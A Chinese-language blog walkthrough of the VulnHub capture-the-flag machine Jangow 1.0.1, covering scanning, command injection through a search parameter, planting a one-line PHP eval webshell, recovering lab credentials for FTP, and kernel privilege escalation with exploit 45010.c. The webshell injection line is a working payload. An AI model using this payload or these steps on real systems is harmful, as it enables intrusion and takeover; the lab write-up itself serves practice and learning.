Jangow: 1.0.1靶机

超详细jangow-01-1.0.1靶机复现过程_jangow靶机-CSDN博客攻略

Jangow: 1.0.1 ~ VulnHub下载地址

1.ova 但是vmware不兼容要改配置

接下来， 删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"

shift+? wq!

忙活了半天算了知道ip就好了

2.端口扫描

访问192.168.2.148:80(80端口就是默认端口,访问时可以不加这个端口,也可以加),我们发现了index of / :说明这是一个目录索引,我们挨个点进去看看能不能发现点有用的东西.

点击site/出现首页.点点看,试着查看下网页源代码(因为很多东西从源代码是能看出来的),好像并没有什么发现.

3.扫描目录

可以发现有

这些扫出来的地址都可以访问试试,最后我们进入到http://192.168.2.148/site/index.html目录下.也就是我们前面访问的80端口进去,点那个/site出现的页面.

我们把能点的地方都点点,最后我们点到Buscar时发现:

4.拿shell

http://192.168.2.148/site/busque.php?buscar=

这个页面虽然是空白页面,但是上方的urL地址栏里有?buscar= 这不是意味着我们可以传参数了?所以,我们试试传点参数,看看页面有没有回显或者变化.

我们传个id进去试试,卧槽,把咱们传的id带进来了,说明这里没有对我们传入的参数进行限制,那我们不得传点有意思的东西进去,比如说,一句话木马(嘿嘿)..

http://192.168.10.104/site/busque.php?buscar=echo '<?php @eval($_POST[1]);?>' >shell.php

我们成功用蚁剑进行了连接,赶快进去看看有啥好东西没?(直接在它电脑里游泳爽)!!!

这里看到了我们传进来的shell.php,嗯不错,再看看有没有账号密码什么的,因为前面目录扫描的时候.扫到了wordpress(网站管理工具)找到后台说不定能登录进去呢.

dirb又扫描了一遍

好,账号密码有了,我们再去好好看看前面的目录扫描,发现并没有找到它的后台登录界面.(oh fuck!!!)

我们进到wordpress目录下的/config.php文件,看到了敏感信息.

接着我们又在html/.backup目录下发现了敏感信息.

整理一下我们的上面过程的信息收集,从最开始的端口扫描,我们扫出来了21端口,80端口,再到目录扫描,我们扫到了一些目录,比如wordpress目录,js目录,assets目录,如下图这些目录,还有两套密码,一套是wordpress的,但是我们找不到后台,还有一套密码,不知道是干啥的,我们试一下21端口,用那套密码连接一下.

这里我们在kali上用我们得到的的用户名jangow01 密码:abygurl69去登录ftp,发现登录成功.

4.反弹shell

讲一下这里的bash -c ，我们在蚁剑打开靶机终端的时候，不是标准的shell环境，bash命令是运行不了的，所以要加上bash -c,其是以命令处理语句。

bash -c "里面的命令"=新开一个干净的 bash，专门执行引号里的完整命令。

这个靶机只能用443 正常来说不止是

但是权限不够要提升权限

5.提权

当前为www-data权限，所以需要提权，查看内核版本和发行版本。

uname -a 显示的是：Linux 内核版本 + 系统架构，

lsb_release -a 发行版本

通过上一步可知内核版本为4.4.0-31，发行版本为Ubuntu16.04，利用searchsploit工具搜索一下，搜索内核版本和发行版本都可以，发行版本多一些。

本文选用内核版本的第一个45010.c，(具体选哪个,我们得看文件介绍,比如我们这里要提权,就看包的后面介绍,比如 local Privilege Escalation就是本地提升权限的意思,如下图) 将45010.c下载到本地.

我试了试wget靶机获取不到 然后把文件从kali里拖到宿主机,再从宿主机拉到蚁剑的目录下

在蚁剑的靶机终端操作如下图:

ls

chmod + x exp1

ls -al

./exp1

• 你的脚本exp1是在 Kali 上编译的，它依赖GLIBC 2.34这个版本的系统库
• 靶机jangow01上的系统库版本太旧，没有GLIBC 2.34，所以脚本跑不起来

思路是这个 但是已经算是打完嘞